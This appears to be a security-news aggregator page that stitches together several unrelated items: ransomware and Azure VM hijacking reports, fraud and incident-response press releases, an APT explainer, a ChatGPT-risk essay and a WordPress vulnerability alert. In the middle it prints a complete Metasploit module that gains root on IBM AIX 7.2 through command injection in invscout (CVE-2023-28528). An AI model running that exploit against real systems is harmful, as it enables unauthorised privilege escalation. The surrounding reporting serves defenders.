Risk from artificial intelligence vectors presents a growing concern among security professionals in 2023.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

10 Types of AI Attacks CISOs Should Track

The work is always going to be there, whether you take a day or a week off. Unfortunately, the cybersecurity community at large is not going to stop cybercrime overnight.

Thursday, May 18, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

You probably already know this by now, but May is Mental Health Awareness Month across the globe.

Many people will apply this time of reflection and education to their personal lives — it’s easy to discuss anxiety, depression and other mental health concerns when it comes to things like personal relationships, friendships, family and how you express yourself.

I think not enough of us are applying the discussions we have every May to work, though. After all, many of us spend more than half our day working, and probably even more than that, thinking about work. And yes, it’s important to maintain healthy relationships around you and share your feelings with loved ones openly, but I would like us all to start being more honest about how work can affect our mental health.

This is particularly a problem in the cybersecurity industry, where burnout is constantly a cloud hanging over the workforce. A study last year from email security company Mimecast found that 84 percent of cybersecurity professionals are experiencing some form of burnout and it’s impeding their motivation at work.

And the Australian non-profit Cybermindz also found cybersecurity workers ranked their “professional efficacy,” or how well they feel they’re performing in their current role, lower than the general population — this is a key metric used to measure burnout in each industry.

I feel this is a problem in cybersecurity for several reasons: it seems like defenders can never take a day (or even an hour) off without something “hitting the fan,” the work can often be incredibly high-stakes and there is the ghost of social media always hanging over our head to be the “first” to find something or always needing to add something witty or insightful to the conversation of the day.

I would certainly not call myself a cybersecurity practitioner, per se, so I don’t have much hands-on experience with this. But I know from talking to teammates as part of my Researcher Spotlight blog series how important it is to have other interests outside of work.

And while I can’t say I’m personally experiencing burnout at work, I have dealt with anxiety for pretty much my entire life and have attended talk therapy on and off over the past few years and currently take medication to manage my various mental health conditions. That makes me feel somewhat empowered to say: It’s OK to take a break.

This is something Talos VP Matt Watchinski said in a conversation with Hazel Burton and I this week that we recorded for an upcoming episode of Talos Takes. The work is always going to be there, whether you take a day or a week off. Unfortunately, the cybersecurity community at large is not going to stop cybercrime overnight. And the threat of state-sponsored actors is not going to be solved by a single botnet takedown.

I would encourage everyone to have harder barriers up around their work and personal lives. Take up a new hobby or find a way to get outside. For example, Azim Khodjibaev is a rowing coach. Giannis Tziakouris from Cisco Talos Incident Response scuba dives. Watchinski has shooting sports.

Find your thing that is not explicitly work — because the work will be there when you get back, I promise.

**The one big thing**

A new ransomware actor we’re calling “RA Group” has been active for about a month, already targeting organizations across multiple sectors in the U.S. and South Korea. Talos researchers believe with high confidence that the group is using altered leaked source code from the Babuk ransomware family. The group is launching double extortion attacks. Like other ransomware actors, RA Group also operates a data leak site in which they threaten to publish the data exfiltrated from victims who fail to contact them within a specified time or do not meet their ransom demands.

**Why do I care?**

The actor is swiftly expanding its operations. To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals. Since ransomware continues to be one of the top security threats all industries face, it’s always important to keep an eye out for new groups that pop up.

**So now what?**

The Talos blog outlines several ways that Cisco Secure products and Talos open-source software can detect and block RA Group’s activities.

**Top security headlines of the week**

**Global governments are being urged to take a more aggressive stance on spyware regulation.** The European Union has agreed to work on standards around the purchase and use of these types of tracking software, which often target vulnerable populations and industries like activists and journalists. A special European Parliament committee voted this week to ban the sale, acquisition, or use of spyware while the broader EU works on these new guidelines. In the U.S., some government agencies have still been attempting to use spyware, such as tools from the infamous NSO Group, despite bans on spyware from the Biden administration. Reporters from the New York Times found at least one government contract with Paragon, another Israeli software developer that makes spyware but is not as widely known as the NSO Group. (New York Times, The Guardian)

**A recent ransomware attack against Micro-Star International (MSI), including the theft of UEFI signing keys, is already having wide-ranging effects** across the security industry. MSI does not have a way to retract the keys after they were leaked onto the dark web, leading to fears of future supply chain attacks. Attackers could hypothetically inject malicious updates into legitimate software, using the MSI keys to sign them. MSI Keys are trusted by default by many end-user devices. Security researchers found that some of the keys work for the Intel BootGuard firmware-verification technology that runs on devices made by several different manufacturers. The Money Message ransomware group first claimed responsibility for the ransomware attack in April when it listed MSI as a new victim on its leak site and published screenshots purporting to show private encryption keys, source code and other data. (Decipher, Ars Technica)

**Twitter announced it was rolling out end-of-end encryption for its direct messages, though several security holes remain.** The company appears to not have actually completed a security audit of its DMs that it claimed it had, and the messages are still vulnerable to man-in-the-middle attacks. One security researcher also says it’s easy for Twitter employees to potentially hijack messages by adding their own keys to a list that are approved to read the messages. Encryption is also a paid feature — both users partaking in the messages must be either Twitter Blue subscribers or a verified organization on Twitter. Group conversations are also not included in this encryption process. Security and privacy experts say users who are looking for secure messaging should stick to encrypted apps like Telegram and Signal. (ZDNet, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #138: What makes “Greatness” so great?
*   Beers with Talos Ep. #135: The XDR files
*   RA Group uses leaked Babuk code to attack companies in the US, South Korea
*   Cisco warns of new ‘Greatness’ phishing-as-a-service tool seen in the wild
*   New 'Greatness' service simplifies Microsoft 365 phishing attacks

**Upcoming events where you can find Talos**

**BSidesFortWayne** **(May 20)**

Fort Wayne, IN

**Threat Modeling webinar: Applying a Threat Informed Defense (May 23)**

Virtual

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women (June 8)**

Doha, Qatar

**REcon** **(June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
**MD5:** df11b3105df8d7c70e7b501e210e3cc3  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 7c8e1dba5c1b84a08636d9e6f225e1e79bb346c176e0ee2ae1dfec18953a1ce2  
**MD5:** 3e0fb82ed8ea6cd7d1f1bb9dca5f2bdc  
**Typical Filename:** PDFShark.exe  
**Claimed Product:** PDFShark  
**Detection Name:** Win.Dropper.Razy::95.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s really OK to take a break sometimes, especially in security

Cybercrime group that often uses smishing for initial access bypassed traditional OS targeting and evasion techniques to directly gain access to the cloud.

A threat actor known for targeting Microsoft cloud environments now is employing the serial console feature on Azure virtual machines (VMs) to hijack the VM to install third-party remote management software within clients' cloud environments.

Tracked as UNC3944 by researchers at Mandiant Intelligence, the threat group is leveraging this attack method to skirt traditional security detections employed within Azure with a living-off-the-land (LotL) attack ultimately aimed at stealing data that it can use for financial gain, Mandiant researchers revealed in a blog post this week.

Using one of its typical method of initial access — which involves compromising admin credentials or accessing other privileged accounts via malicious smishing campaigns — UNC3944 establishes persistence using SIM swapping and gains full access to the Azure tenant, the researchers said.

From there, the attacker has a number of options for malicious activity, including the exportation of information about the users in the tenant, collection of information about the Azure environment configuration and the various VMs, and creation or modification of accounts.

"Mandiant has observed this attacker using their access to a highly privileged Azure account to leverage Azure Extensions for reconnaissance purposes," the researchers wrote. "These extensions are executed inside of a VM and have a variety of legitimate uses."

**Hijacking the VM**

By leveraging in particular the serial console in Microsoft Azure, UNC3944 can connect to a running OS via serial port, giving the attacker an option besides the OS to access a cloud environment.

"As with other virtualization platforms, the serial connection permits remote management of systems via the Azure console," they wrote. "The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer."

UNC3944 is a financially motivated threat group active since last May that typically targets Microsoft environments for ultimate financial gain. The group was previously seen in December leveraging Microsoft-signed drivers for post-exploitation activities.

However, once UNC3944 takes control of an Azure environment and uses LotL tactics to move within a customer's cloud, the consequences go beyond mere data exfiltration or financial gain, one security expert notes.

"By gaining control of an organization's Azure environment, the threat actor can plant deepfakes, modify data, and even control IoT/OT assets that are often managed within the cloud," Bud Broomhead, CEO at Viakoo, a provider of automated IoT cyber hygiene, said in a statement sent to Dark Reading.

**From the VM to the Environment**

Mandiant detailed in the post how the threat actor targets the VM and ultimately installs commercially available remote management and administration tools within the Azure cloud environment to maintain presence.

"The advantage of using these tools is that they’re legitimately signed applications and provide the attacker remote access without triggering alerts in many endpoint detection platforms," the researchers wrote.

Before pivoting to another system, the attacker set up a reverse SSH (Secure Shell Protocol) tunnel to its command-and-control (C2) server and deployed a reverse tunnel configured such that port forwarding any inbound connection to remote machine port 12345 would be forwarded to the localhost port 3389, they explained in the post. This allowed UNC3944 a direct connection to the Azure VM via Remote Desktop, from which they can facilitate a password reset of an admin account, the researchers said.

The attack demonstrates the evolution and growth in sophistication of both attackers' evasion tactics and targeting, the latter of which now goes beyond the network and the endpoint directly to mobile devices and the cloud, notes Kern Smith, vice president of Americas, sales engineering at mobile security firm Zimperium.

"Increasingly, these attacks are targeting users where organizations have no visibility using traditional security tooling — such as smishing — in order to gain the information needed to enable these types of attacks," he says.

**How to Defend Against this VM Attack**

To thwart this type of threat, organizations must first prevent targeted smishing campaigns "in a way that enables their workforce while not inhibiting productivity or impacting user privacy," Smith says.

Mandiant recommends restricting access to remote administration channels and disabling SMS as a multifactor authentication method wherever possible.

"Additionally, Mandiant recommends reviewing user account permissions for overly permissive users and implementing appropriate Conditional Access Authentication Strength policies," the researchers wrote.

They also directed organizations to the available authentication methods in Azure AD on the Microsoft website, recommending that least-privilege access to the serial console be configured according to Microsoft's guidance.

Microsoft Azure VMs Hijacked in Cloud Cyberattack

Elevated attack rate expected to remain during 2023 as cybercrime becomes more sophisticated and widespread.

**ATLANTA****,** **May 17, 2023** **/PRNewswire/ --** LexisNexis® Risk Solutions today released the results of its annual Cybercrime Report, an analysis of data from 79.8 billion transactions processed through its LexisNexis® Digital Identity Network® throughout 2022. The report, _Trust and Collaboration as Foundations to Fight Fraud_, shows that the global digital attack rate increased 20% year over year (YOY) compared to 2021, continuing the trend of digital fraud rising as economies re-open following the pandemic.

The LexisNexis® Identity Abuse Index, which records the percentage of attacks per day, shows attack rates fell in the fourth quarter of 2022 although the picture varies by region, with sizeable spikes in APAC, LATAM and North America at the end of the year. 

Despite the effects of economic uncertainty, inflation and the war in Ukraine, digital transactions in 2022 went up by 24% YOY primarily driven by increasing transactions in financial services (29%) and ecommerce (17%).

Organizations are looking to establish consistent digital identity insights across all digital channels and end-customer touch points to mitigate rising fraud levels. They are striving to increase the level of trust with their customers, as well as identifying risk more easily. The report showed that the percentage of transactions classified as trusted in the Digital Identity Network® platform increased by 9% YOY, allowing organizations to provide a smoother customer journey.

"Businesses remain vulnerable to transactional fraud during this time of accelerated digitalization," said Stephen Topliss, vice president of fraud and identity strategy for LexisNexis Risk Solutions. "Despite heightened regulatory scrutiny, technological innovations and higher public awareness, there are persistent challenges in preventing fraud. This trend is likely to endure as consumers continue adopting digital channels. As fraud levels and its sophistication increase, relying on multi-factor authentication alone as a defense is inadequate in today's digital world. Organizations, industries and countries must collaborate and identify the interconnected signals of complex fraud attacks because criminal networks working in a structured way are here to stay. Addressing the latest scams requires targeted machine learning models that can consume the latest digital intelligence insights, behavioral biometrics signals and mule account indicators."

**Key findings from** _The LexisNexis Risk Solutions Cybercrime Report, January to_ December 2022**:**

*   **Mobile Channels Increasingly Popular** **–** Mobile transactions have reached a record high of 77% of all observed transactions in the Digital Identity Network, with the mobile app channel making up 82% of all mobile interactions.
*   **Attack Rate Continues to Rise** **–** The global attack rate continues to increase, driven by an uptick in the financial services and ecommerce industries at 31% and 29% respectively. The report shows that criminals continue to target the communications, mobile and media industries more than any other sector. However, a noticeable decline of 27% YOY in the overall attack rate suggests criminals are changing focus. 
*   **Vulnerabilities in Payments –** Across all desktop and mobile channels, attack rates on digital payments increased 27% YOY. Alternative payment methods, such as digital wallets, QR code payments and peer-to-peer transfers, continue to gain popularity, particularly in APAC. The shift has contributed to the 32% YOY growth in payment transactions in that region, yet criminals are also fast at exploiting vulnerabilities. The report shows a 50% YOY increase in APAC's payment attack rate.
*   **Lucrative Avenue for Cybercrime –** Automated bot attacks in the ecommerce space have grown 195% globally. Almost half of these attacks focused on the U.S., where ecommerce focused bot attacks increased by 127% YOY. Bot attacks increased 112% in the U.S. gaming and gambling industry, while the sector grows due to legalization in more states.

Download a copy of _Trust and Collaboration as Foundations to Fight Fraud: The_

**Methodology**

The LexisNexis Risk Solutions Cybercrime Report is based on cybercrime attacks detected by the Digital Identity Network platform. It processed 92 billion transactions in 2022, including common attack types such as new account creation, account login and payment fraud. It analyzes transactions for legitimacy based on device identification, geolocation, history and behavioral analytics in near real-time, providing insight into global digital identities. Customers benefit from global risk views and custom-tuned policies. The report covers "high-risk" transactions scored by global customers. Digital Identity Network does not include transaction data from all countries in the world.

**About LexisNexis Risk Solutions**

LexisNexis® Risk Solutions includes seven brands that span multiple industries and sectors. We harness the power of data, sophisticated analytics platforms and technology solutions to provide insights that help businesses and governmental entities reduce risk and improve decisions to benefit people around the globe. Headquartered in metro Atlanta, Georgia, we have offices throughout the world and are part of RELX (LSE: REL/NYSE: RELX), a global provider of information-based analytics and decision tools for professional and business customers. For more information, please visit www.risk.lexisnexis.com and www.relx.com.

LexisNexis Risk Solutions Cybercrime Report Reveals 20% Annual Increase in Global Digital Attack Rate

New retainer provides expert support starting in the first 72 hours of the incident response process to contain the attack and improve preparedness for the future.

**Helsinki, Finland – May 17, 2023:** The first 72 hours of an attack are a crucial window for incident response teams. To support organizations in preparing a swift, efficient response to incidents while minimizing their impact on operations, WithSecure™ (formerly known as F-Secure Business) is offering a new range of incident readiness and response packages.  

Incident response is more challenging than ever. Cloud services complicate IT security, skills are scarce, and responsibilities are shared with cloud service providers.   

Based on his experience, Cyber Security Advisor Paul Brucciani says that in spite of cyber attacks’ ubiquity, many mid-market organizations find themselves unprepared for incidents when they occur.

“Today, only about one in five organizations have an incident response plan–typically enterprises with well-developed cyber security. Mid-market companies don’t have these resources and if there is any service fit to be outsourced, it is incident response. Our new offering brings industry-leading incident response services to the mid-market to make it more resilient to cyber-attacks, covering both traditional on-premise and cloud IT,” he said.  

WithSecure™ has a strong record of providing incident response services to organizations large and small throughout the globe. It has over 30 years of experience in helping organizations prepare for, respond to, and recover from data breaches. Its incident response capability is assured by government agencies in Germany and the UK.

The new range of incident response offerings include three different but related services:  

*   Incident Readiness
*   Incident Response Retainer
*   Emergency Incident Response Support  
    

"The first 72 hours of an attack are vital for limiting the damage. Not just to mitigate direct damages, but it’s also important for GDPR compliance, as organizations are required to report certain incidents within that time frame. Without an effective response during that window, organizations will struggle to understand the scope of the damages and what steps to take next,” added Brucciani.    

More information on WithSecure's range of incident response services is available at

**About WithSecure™**

WithSecure™, formerly F-Secure Business, is cyber security's reliable partner. IT service providers, MSSPs and businesses – along with the largest financial institutions, manufacturers, and thousands of the world's most advanced communications and technology providers – trust us for outcome-based cyber security that protects and enables their operations. Our AI-driven protection secures endpoints and cloud collaboration, and our intelligent detection and response are powered by experts who identify business risks by proactively hunting for threats and confronting live attacks. Our consultants partner with enterprises and tech challengers to build resilience through evidence-based security advice. With more than 30 years of experience in building technology that meets business objectives, we've built our portfolio to grow with our partners through flexible commercial models.  

WithSecure™ Corporation was founded in 1988, and is listed on NASDAQ OMX Helsinki Ltd.

WithSecure Launches New Range of Incident Response and Readiness Services

This Metasploit module exploits a command injection vulnerability in IBM AIX invscout set-uid root utility present in AIX 7.2 and earlier. The undocumented -rpm argument can be used to install an RPM file; and the undocumented -o argument passes arguments to the rpm utility without validation, leading to command injection with effective-uid root privileges. This module has been tested successfully on AIX 7.2.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'invscout RPM Privilege Escalation',        'Description' => %q{          This module exploits a command injection vulnerability in IBM AIX          invscout set-uid root utility present in AIX 7.2 and earlier.          The undocumented -rpm argument can be used to install an RPM file;          and the undocumented -o argument passes arguments to the rpm utility          without validation, leading to command injection with effective-uid          root privileges.          This module has been tested successfully on AIX 7.2.        },        'Author' => [          'Tim Brown', # Discovery and PoC          'bcoles' # Metasploit        ],        'References' => [          ['CVE', '2023-28528'],          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],        ],        'Platform' => %w[unix aix],        'Arch' => ARCH_CMD,        'Payload' => {          'BadChars' => "\x00\x0a\x0d\x22",          'Compat' => {            'PayloadType' => 'cmd',            'RequiredCmd' => 'generic telnet openssl'          }        },        'DefaultOptions' => {          'PrependSetresuid' => true,          'PrependSetresgid' => true,          'PrependFork' => true        },        'SessionTypes' => %w[shell meterpreter],        'Targets' => [['Automatic', {}]],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-04-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])    ])  end  def invscout_path    datastore['INVSCOUT_PATH']  end  def check    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)    res = execute_command('id')    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')    CheckCode::Vulnerable("Output: #{id}")  end  def execute_command(cmd, _opts = {})    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"    rpm_args = "; #{cmd}; echo "    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")    vprint_line(res) unless res.blank?    res  end  def exploit    execute_command(payload.encoded)  endend

IBM AIX 7.2 inscout Privilege Escalation

Categories: Business
Unpacking one of the most dangerous threats in cybersecurity.



(Read more...)




The post APT attacks: Exploring Advanced Persistent Threats and their evasive techniques appeared first on Malwarebytes Labs.

Cyber criminals come in all shapes and sizes.

On one end of the spectrum, there’s the script kiddie or inexperienced ransomware gang looking to make a quick buck. On the other end are state-sponsored groups using far more sophisticated tactics—often with long-term, strategic goals in mind.

Advanced Persistent Threats (APT) groups fall into this latter category.

Well-funded and made up of an elite squadron of hackers, these groups target high-value entities like governments, large corporations, or critical infrastructure. They often deploy multi-stage, multi-vector approaches with a high degree of obfuscation and persistence.

But for every small-to-medium-sized business (SMB) out there asking themselves "Why would an APT group care about me?" We have the answer. 

**SMBs can be stepping stones to bigger targets—especially if they're in a supply chain or serve larger entities**. A whopping 93% of SMB execs even think nation-state hackers are using businesses like theirs as a backdoor into the country's digital defenses.

In this post, we’ll break down how APT groups work, explain their tactics and evasive techniques, and how to detect APT attacks.

**How APT groups work**

The aim of APT groups is not a quick hit, but a long-term presence within a system, allowing them to gather as much information as they can while remaining undetected.

APTs stand apart from typical cybercriminals in several key ways:

*   **Motive**: Unlike ordinary cybercriminals, APTs are primarily driven by the acquisition of intelligence. While they might engage in activities that yield financial gains, their primary funding comes from the state they serve, not from their operations.
*   **Tools**: APTs have access to advanced tools and zero-day vulnerabilities. They keep these under wraps for as long as they can, only resorting to destructive malware when necessary.
*   **Crew**: APTs consist of experienced and motivated individuals who work in close coordination with one another. This is a stark contrast to traditional cybercriminals, where distrust often prevails.

An example of APT reconnaissance (RedStinger) as observed by the Malwarebytes Threat Intelligence Team 

So, how does an APT work its dark magic? Here's a quick rundown:

*   **Step 1**: _Reconnaissance_. This could be anything from figuring out whether there's sensitive data or information worth stealing to making a hit list of employees or ex-employees.
*   **Step 2**: _Infiltration_. Usually, this involves some crafty social engineering, like spear phishing or setting up a watering hole to deliver custom malware.
*   **Step 3**: _Establishing a foothold_. APTs need someone inside the target's network to run their malware.
*   **Step 4**: _Expanding their reach_. This might involve further deployment of malware, reconnaissance of the network, or other activities aimed at consolidating their position.
*   **Step 5**: _Data acquisition_. The ultimate goal is to acquire the desired data. They might need to get more access in the network to do this.
*   **Step 6**: _Maintaining presence_. Once they're in, they might need to create more entry points or even leave a backdoor open for a return visit. If they're done, they'll clean up their mess to cover their tracks.

While not all these steps are required in every case, and the time and effort expended on each can vary widely, this provides a general framework for understanding how APTs operate.

**Evasive techniques of APT attacks**

Alright, now that we know the basics of how APTs operate, let's dive into the specifics of their tools, techniques, and procedures (TTPs).

TTP (MITRE ATT&CK)

Description

**Phishing (Spear-phishing Attachment, Spear-phishing Link)**

APT groups frequently initiate targeted spear-phishing attacks, often combined with social engineering and exploitation of software vulnerabilities, to gain initial access to a target network.

**Execution through API (T1059.005) or User Execution (T1204)**

Once inside a network, APTs use legitimate system tools and processes to carry out their activities in a way that blends in with normal network activity and avoids detection.

**Exploitation for Client Execution (T1203)**

APT groups frequently discover and exploit zero-day vulnerabilities — these are software flaws unknown to the software's vendor at the time of exploitation.

**Lateral Movement (Tactic ID: TA0008)**

After gaining initial access, APTs use lateral movement techniques, such as Pass the Hash (PtH), to explore the network, elevate their privileges, and gain access to more systems.

**Exfiltration Over C2 Channel (T1041)**

APTs typically employ advanced, stealthy techniques for stealing data, such as splitting it into small packets, encrypting it, or sending it out during normal business hours to blend in with regular traffic.

**Establish Persistence (Tactic ID: TA0003)**

APT groups use techniques like multiple backdoors, rootkits, and even firmware or hardware-based attacks to maintain access to a network even after detection and remediation efforts.

**Supply Chain Compromise (T1195)**

APTs sometimes compromise software or hardware vendors to exploit the trust relationships between those vendors and their customers, thereby gaining access to the customers' systems.

In a word, APT groups use methods like "living off the land" (utilizing built-in software tools to carry out their activities), fileless malware (malware that resides in memory rather than on disk), encryption (to hide their communication), and anti-forensic measures (to cover their tracks). 

**Breakdown of different APT groups**

Attribution is always a bit thorny when it comes to different APT groups, but some groups are rather well-known and their origin has become clear. A naming convention that not everyone follows is: Chinese APT actors are commonly known as “Pandas,” Russian APTs as “Bears,” and Iranian APTs as “Kittens”.

Some examples:

*   **APT28** aka Fancy Bear (Russia)
*   **Nemesis Kitten** (Iran) a sub-group of Iranian threat actor Phosphorus (APT35)
*   **APT1** aka Comment Panda aka unit 61398 of the People's Liberation Army (China)

Countries typically have different groups that focus on different targets, but generally speaking, some of the most frequently hit sectors are governments, aerospace, and telecommunications. 

According to the cyber threat group list compiled by MITRE ATT&CK, we're aware of over 100 APT groups worldwide. The majority of these groups have ties to China, Russia, and Iran. In fact, China and Russia alone are reportedly connected to nearly 63% of all these known groups.

For the purposes of this article, I compiled data on 37 different APT groups listed by American cybersecurity firm Mandiant and broke them down by country. I also ran numbers of the most frequently mentioned target industries; as this data comes from a relatively small sample size, treat these as rough estimates. 

**Detecting Advanced Persistent Threats (APTs)**

You've got a few tricks up your sleeve when it comes to detect APTs on your network.

You can use things like Intrusion Detection and Prevention Systems, or IDS/IPS for short, which keep an eye on your network traffic. Regular check-ups on your logs and network can also give you clues.

Then there's following bread crumbs known as Indicators of Compromise (IoCs) and watching for any weird behavior from users or end devices. But here's the thing, these threats are getting smarter and trickier.

**That's where Endpoint Detection and Response (EDR) comes in**. Let's take a look at how EDR can help level up your defense game against these APTs.

Consider, for example, the fairly common case of an APT group using **Mimikatz**, an open source tool for Windows security and credential management, to extract credentials from memory and perform privilege escalation. MITRE lists at least 8 APT groups observed to use Mimikatz for this exact purpose. 

Using Malwarebytes EDR, we can find suspicious activity like this and quickly isolate the endpoint with which it's associated.

Clicking into a high-severity alert, we'll see that we have categorization of rules to help a maybe newer or less savvy security expert understand what's going on with this process.

What we see here is the actual categorization of behaviors that Malwarebytes witnessed in this process. Each of these little bubbles has been color coded to help you understand the severity of this issue.

At the bottom, we have a detailed process timeline as well. Clicking into any of these nodes, we get a lot of rich context information about what this process did.

As a security analyst or an IT admin, the first question you typically ask when an incident occurs is: What happened? Do we know if it's malicious? What is the actual extent of the potential damages? And so on.

We can see the exact time that it ran and the file hashes, so if we needed to do further investigation, we have those available. And most importantly, we’ve highlighted below the command line actually used to execute this technique on our machine.

This is really suspicious looking code that could definitively be a sign of an APT on the network. **This PowerShell command is downloading and executing Mimikatz from a remote server. Let's remediate ASAP!**

Closing this view out we'll find a "**Respond**" option in the upper-right hand corner with a drop-down menu to "**Isolate Endpoint**".

We have three layers of isolation that we can provide: network isolation, process isolation, and desktop isolation.

The network and process isolations are intended to give us the ability to quarantine that machine and prevent it from doing anything that is not authorized by Malwarebytes.

What this means is, we can still use our Malwarebytes console to trigger scans to perform other tasks and to review data, but the machine otherwise can't communicate or run anything else. 

Bam! This potential APT threat is blocked all in a matter of minutes.

Want to see Malwarebytes EDR in action? Learn more here.

**Respond to APT attacks quickly and effectively**

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to APT attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.

**Stop APT attacks today**

APT attacks: Exploring Advanced Persistent Threats and their evasive techniques

As ChatGPT adoption grows, the industry needs to proceed with caution. Here's why.

With ChatGPT making headlines everywhere, it feels like the world has entered a _Black Mirror_ episode. While some argue artificial intelligence will be the ultimate solution to our biggest cybersecurity issues, others say it will introduce a whole slew of new challenges.

I'm on the side of the latter. While I recognize that ChatGPT is an amazing piece of technology, it is also an enabler for hackers, commoditizing nation-state capabilities for the benefit of the "script kiddies" — aka unsophisticated hackers. In addition to writing text, the technology opens up a scary scenario where a computer can be guided to look for information within images that humans can't immediately pick up but machines are sensitive enough to see. Examples would be reflections of passwords on glass, or people who appear in photos that would not appear in them without the help of AI.

As ChatGPT adoption grows, I believe the industry needs to proceed with caution, and here's why. There are three types of capabilities hackers can use ChatGPT for: mass phishing, reverse engineering, and smart malware. Let's take a look at each one of these in detail.

**Mass Phishing**

Because ChatGPT is so powerful, it can reduce the amount of time it takes to create handcrafted, personalized emails to a list of people from a few days to just minutes. And with just the click of a button, ChatGPT can answer very specific questions and use its knowledge to impersonate both security and non-security personnel experts. Because ChatGPT can also translate text into any style of writing or proofread at a very high level, once a list of employees and their details are attained, it's easy to mass create emails where a hacker is pretending to be someone else to increase the chances of a successful attack.

Phishing is an essential part of hacking organizations, whether it be to gain access to the servers of an organization or to attempt to convince people to transfer money. To combat this, business leaders must educate employees on the security implications of ChatGPT and how to spot potential attacks. I think employees should be especially critical of text and never assume something is coming from an authentic source. Instead of just blindly trusting anyone, employees should put their trust in other mechanisms, like paying close attention to whether an email/code came from the company server or whether it includes the proper signature. My biggest advice is for employees to use other means of verification besides the style of the text itself.

**Reverse Engineering**

ChatGPT is amazing at understanding code, or even machine code. By providing either binary code or obfuscated code of a system, ChatGPT can explain how the code works and what it does in a way that makes it easy for hackers to manipulate the piece of software and enable them to gain access to the company's servers.

Reverse engineering used to be a very rare and highly lucrative skill; historically, only nation-states could incorporate it into their operations. This is now something that can be done by the most basic hackers.

**Smart Malware**

ChatGPT can function as a mini-brain for malware, making it completely autonomous. Nowadays, sophisticated malware allows the hacker to tunnel through a company's servers to observe the hacked network and servers, and send commands on how to extract information. This operation usually involves a hacker connecting to malware he or she has managed to install somewhere within the hacked company's network or servers.

With ChatGPT, the malware can make decisions autonomously so it understands where the interesting data is, where passwords might be stored locally, and even how to connect to the data sources and extract the data automatically. ChatGPT can sift through much more data than a human — in some cases, even do it better — making the risk of a malware using ChatGPT much more dangerous than would be the case with simple malware that allows hackers to connect and operate it. Since it is completely autonomous — there's no longer a need for a hacker to control the malware and manually direct it to the right place — it is not only more dangerous, but it could be more common. This means more companies are at risk for being sporadically attacked, instead of being specifically targeted.

We've already seen Samsung fall victim to one of the first cyberattacks using ChatGPT, and it surely won't be the last to do so. This serves as a good reminder that companies across all industries must stay vigilant, training their employees to understand the cybersecurity risks of ChatGPT — not only when they are using it themselves, but when somebody else may be using it against them. Over time, I expect (and encourage) investment priorities to change so that privacy and security teams can ensure their organizations are not vulnerable to the negative ramifications of ChatGPT.

3 Ways Hackers Use ChatGPT to Cause Security Headaches

On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. Versions 5.7.1 and below are affected.

    Attackers are already exploiting the critical Authentication Bypass Vulnerability in Essential Addons for Elementor.On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.Over the past few days we’ve seen millions of probing attempts for the plugin’s readme.txt file, which are likely to be attackers probing for the presence of the plugin to build a target site exploit list, along with over 6,900 blocked exploit attempts. Our attack data is limited due to the fact that the rule only triggers if the plugin is installed on a site with a vulnerable version, but a programmatic exploit was made public on Github on May 14th. This is the type of vulnerability that tends to see widespread attacks due to a combination of a large install base, ease of exploitation, and severity of impact, and we anticipate that exploit attempts will only ramp up from here.Wordfence Premium, Care, and Response customers received a firewall rule the same day the issue was disclosed on May 11, 2023. Wordfence free users will receive that same protection 30 days later on June 20, 2023. Considering how easily this vulnerability can be successfully exploited, we highly recommend all users of the plugin update ASAP to ensure their site is not compromised by this vulnerability.This email content has also been published on our blog and you're welcome to post a comment there if you'd like to 